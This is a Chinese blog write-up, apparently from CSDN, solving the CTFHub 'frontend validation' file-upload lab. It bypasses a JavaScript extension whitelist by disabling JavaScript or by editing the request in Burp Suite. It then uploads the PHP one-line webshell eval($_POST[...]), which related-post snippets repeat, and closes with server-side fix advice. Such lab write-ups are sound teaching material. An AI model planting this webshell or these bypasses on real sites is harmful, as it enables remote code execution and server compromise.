CTFHub | 前端验证

已于 2023-02-25 17:02:39 修改
阅读量2.1k 收藏 10
点赞数 1
分类专栏: CTF精进之路 文章标签: 前端 web安全 CTF
于 2023-02-25 16:56:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_51191308/article/details/129194016
版权
文章介绍了两种方法绕过CTFHub平台的前端文件上传验证,包括禁用浏览器JavaScript来上传PHPpayload和利用Burpsuite抓包修改文件类型。同时提出了服务器端验证、文件头检查等安全修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

前端验证:

        (无)

网页显示内容

        

        

0x02 解题过程

        前端验证是通过对客户端输入数据的合法性进行检查来确保数据是有效且安全的。通常,它会通过一系列简单的规则,如长度检查、格式检查、正则表达式匹配等,验证用户输入是否符合要求,以提高应用程序的安全性和可用性。

        

0x1 方法一: 禁用浏览器JavaScript 

这里以火狐浏览器为例,首先需要在浏览器地址栏输入about:config并按回车

about:config

        

点击接受风险并继续后进入高级首选项搜索框界面

        

在高级首选项搜索框界面中搜索javascript.enabled,点击转换按钮将true值切换为false

javascript.enabled

        

true值改为false后,重新打开网页URL

        

编写payload

<?php @eval($_POST['CTFhub']);?>

        

在网页中上传编写好的一句话木马

        

打开蚁剑进行连接并添加到数据中

        

检查网页目录,发现此题flag

        

0x2 方法二: Burpsuite抓包 

使用ChatGPT对URL网页做一个简单的代码审计,根据ChatGPT的提示,发现此代码只做了前端验证,并未上传到服务器中,那么此题的思路可以是绕过前端验证。因为在代码部分白名单中仅有.jpg、.png、.gif文件。没有做太多的过滤。

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>CTFHub 文件上传 - js前端验证</title>
</head>
<body>
    <h1>CTFHub 文件上传 - js前端验证</h1>
    <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()">
        <label for="file">Filename:</label>
        <input type="file" name="file" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />
    </form>
<script>
function checkfilesuffix()
{
    var file=document.getElementsByName('file')[0]['value'];
    if(file==""||file==null)
    {
        alert("请添加上传文件");
        return false;
    }
    else
    {
        var whitelist=new Array(".jpg",".png",".gif");
        var file_suffix=file.substring(file.lastIndexOf("."));
        if(whitelist.indexOf(file_suffix) == -1)
        {
            alert("该文件不允许上传");
            return false;
        }
    }
}
</script>
</body>
</html>

        

上传一个伪装成白名单的文件绕过前端验证

        

上传成功后使用Burpsutie抓包工具进行抓包

        

修改抓取到的数据,将上传的一句话木马文件重新改为shell.php文件

        

传入木马数据成功后使用蚁剑连接

         

检查网页目录,发现此题flag

        

        

0x03 修复建议

[1].在服务器端对上传的文件进行验证,以确保上传的文件是被允许的类型,并且不包含恶意代码。

[2].不要仅仅依赖文件后缀名来验证文件类型,最好通过解析文件头或使用其他方法来确保上传的文件是被允许的类型。

[3].在使用 innerHTML 时,最好使用 DOM 操作而不是字符串操作,这样可以避免 XSS 攻击。

[4].在使用表单时,最好将 action 属性设置为表单处理程序的 URL,并使用 CSRF 令牌防止 CSRF 攻击。

[5].确保使用一致的变量名称,以使代码更易于阅读和理解。

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

文件上传————ctfhub验证前端验证
qq_45655564的博客
05-29 595
CTFHUB文件上传之无验证 这种是最简单的一种类型,直接上传文件然后用蚁剑连接即可 这里写好一句话木马。 上传之后这里给出了上传文件的相对路径 upload/1.php 连接成功后,进入文件管理找flag 到这里就结束了 CTFHUB文件上传之前端验证 这里题目直接说了是js前端验证,这里用brupsuite解决,方法很多。 当我们再次上传php文件的时候显示改文件不允许上传,这里可以把php改为其他类型的文件 这里改了文件后缀名之后可以进行上传,用bru
CTFHUB-web-信息泄漏
2401_84254530的博客
07-20 1342
Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git 目录,用来记录代码的变更记录等。通过了解知道vim缓存文件的后缀名为 .swp 根据提示我们知道flag在index.php中,而一般情况下vim缓存文件都是隐藏的,我们要找的他的flag就可以直接在.index.php后面跟一个.swp。这就引起了git泄露漏洞。但是我们在这么输入过后,得到的是“未找到”,但是却得到了一份文件,我们下载好这份文件,并使用记事本打开,就可以得到flag。
CTFHUB技能树之文件上传——前端验证
weixin_73049307的博客
10-21 636
(小插曲:本来我想着直接删除onsubmit处的代码的,但是删了之后还是会触发checkfilesuffix()函数对上传的文件进行验证)可以看出对上传的文件做了限制,只能上传.jpg、.png、.gif文件。看到提示是js前端验证。可以看到文件上传成功。
CTFHUB——文件上传之前端验证
wuuconix's blog
09-01 1128
网页源码 <body> <h1>CTFHub 文件上传 - js前端验证</h1> <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()"> <label for="file">Filename:</label> <input type="file"
5分钟带你入门—CTFHub技能树(最详细教程)
最新发布
2201_75642447的博客
03-30 900
CTF(CaptureTheFlag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
CTFhub-文件上传-前端验证
ssss39的博客
08-28 544
上传-->抓包-->改包 (删掉 .jpg) --> 点击 放行。用 GodZilla 生成木马 文件名为 1.php.jsp。burp 抓包 --> 重发--> 查看源代码。
CTFHub 文件上传 - js前端验证
m0_52432374的博客
02-18 546
CTFHub 文件上传 - js前端验证 直接上传一句话木马yjh.php,发现结果返回很快(js前端验证标志) 解题方法: 看到js前端验证,想到 1.查看源代码发现允许jpg文件上传 2.先把一句话木马yjh.php改为yjh.php.jpg 3.打开代理,用bs抓包,得到 此时荧光部分改为yjh.php 4.再点击forward,显示文件上传成功,得到文件上传路径5.构造payload用蚁剑连接: http://challenge-5788ac737f2b5b31.sandbox.ctfhub.c
ctfhub文件上传---js前端验证
x2813488062的博客
01-27 1486
解题思路 前端进行了验证,将上传木马文件改为前端验证文件如png,jpg.... 上传抓包修改上传文件格式,这样就绕过了前端验证 在抓到的包中可看见自己的上传文件格式,我们对其修改为.php,修改后放包即可 成功上传后我们拿到了相对地址,这时可以用蚁剑去测试连接 测试连接成功(如果连接不成功检查连接密码,以及上传木马代码是否正确),我们直接进入更目录拿到flag ...
CTFHUB文件上传----前端验证
Y4tacker的博客
07-23 9401
既然是js前端验证那么直接把js禁用就行了,少废话 上传成功去蚁剑或者菜刀等 配置连接 在flag.php文件中得到flag
ctfhub-前端验证,.htaccess,MIME绕过,文件头检查,00截断,双写后缀
weixin_55702959的博客
02-02 1487
目录 文件上传-前端验证 文件上传-.htaccess 文件上传-MIME绕过 文件上传-文件头检查 文件上传-00截断 文件上传-双写后缀 eval执行 文件上传-前端验证 上传文件时,客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传,于是关掉他 about:config 一句木马 <?php @eval($_POST['123']); ?> 命名为1.php之后上传文件,用蚁剑打...
CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证前端验证
Static______的博客
04-15 1925
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功。此时,再上传一句话木马,并把文件改为png格式。
CtfHub-wp(web
01-23
文件上传漏洞允许我们上传PHP一句话木马,通过前端验证的绕过(例如在Firefox中禁用前端代码),或者利用`.htaccess`文件实现文件解析漏洞,将木马文件以非正常扩展名上传。 `.htaccess`文件是Apache服务器上的一个...
ctfhub web全部做题记录(持续跟新)
01-08
通过修改文件头,绕过前端验证,可以实现远程代码执行。 【文件头检查】某些安全机制会检查上传文件的头信息以确保其安全性。通过伪造文件头,可以上传原本不允许的文件类型,如将图片文件头改为PHP。 【总结】在...
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3381
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
CTFHUB-技能树-Web题-文件上传(前端验证—文件头检查)
Static______的博客
04-17 1511
由此可见,只要是相同类型的文件,他的文件头就是一样的,这样代表了这个文件是属于什么类型,既然本题用到的是文件头检查,那我们制作一个图片马,将我们的一句话代码放入图片里面然后进行上传。我们先创造一个名为1.png的图片,然后写一个名为1.php的一句话代码,把他们放到同一目录下,用cmd生成一个名为2.php的图片马。右侧开头%PNG就是这个文件的文件头,这也代表了这个文件是一个png文件,打开一个jpg文件。简单来说,就是每个文件的最开头部分,就是文件头,他代表了这个文件的是属于什么类型,例如。
CTFHUB-技能树-Web题-文件上传(前端验证—MIME绕过、00截断、00截断-双写后缀)
Static______的博客
04-16 3402
参考链接:http://www.admintony.com/%E5%85%B3%E4%BA%8E%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%8400%E6%88%AA%E6%96%AD%E5%88%86%E6%9E%90.html。00截断简单来说,就是由于php解释器是由C语言编写的,所以遵循C语言解析文件时遇到ascll码0时停止解析,而%00表示ascll码中的0,所以php解释器在解析文件时遇到%00就会默认文件名已经解析结束,所以我们可以利用这一原理进行上传。
CTFHub | Web——文件上传(前端验证
2301_76435948的博客
10-07 1105
在通过验证之后还未发出时,拦截HTTP请求,然后修改数据,使得JavaScript的验证不起作用。虽然将后缀名改回.php,里面的代码仍然存在,但是我想要的是图片形式的木马啊(Q_Q)cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。JavaScript属于前端验证,在浏览器未提交数据时进行验证。修改图片内容 在图片txt格式末尾加一句话木马。修改图片内容 在图片txt格式末尾加一句话木马。利用工具edjpgcom。
CTFHUB--web文件上传(前端验证
yuanqiqi_的博客
07-08 315
1. 查看页面代码可知,文件后缀只能是.jpg、.png或.gif 2. 将文件(文件内容还是一句话木马,不知道可以从无验证那篇文章找)后缀改为.jpg格式(三选一即可)进行上传,同时打开bupsuite进行抓包 Burpsuite抓到的包如下: 3. 将文件名的后缀改为php,后点击forward将包发到服务器,页面显示上传成功 4. 将文件的路径输入到蚁剑中进行连接,找到对应的页面获得flag ...
ctfhub修改前端代码给表单添加一个提交按钮
10-27
CTFHub(网络安全比赛平台)的前端代码中,如果你想给一个HTML表单添加一个提交按钮,你可以按照以下步骤操作: 1. 首先,在HTML结构中找到你的表单元素。通常,它会有`<form>`标签,例如: ```html <form id="myForm"> <!-- 表单内容 --> </form> ``` 2. 在表单下方或者合适的位置,添加一个新的`<button>`元素,设置其type属性为"submit",这是为了指定这是一个提交按钮: ```html <button type="submit">提交</button> ``` 如果你想自定义按钮的文字,可以将文本放在`<button>`标签内的任意位置,比如: ```html <button type="submit">发送报告</button> ``` 3. 保存你的更改。如果你正在使用像React、Vue这样的前端框架,确保你在适当的生命周期方法中处理表单提交事件,如`onSubmit`。 完整的示例代码可能会类似这样: ```html <form id="myForm"> <!-- 表单输入框等内容 --> <button type="submit">提交</button> </form> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值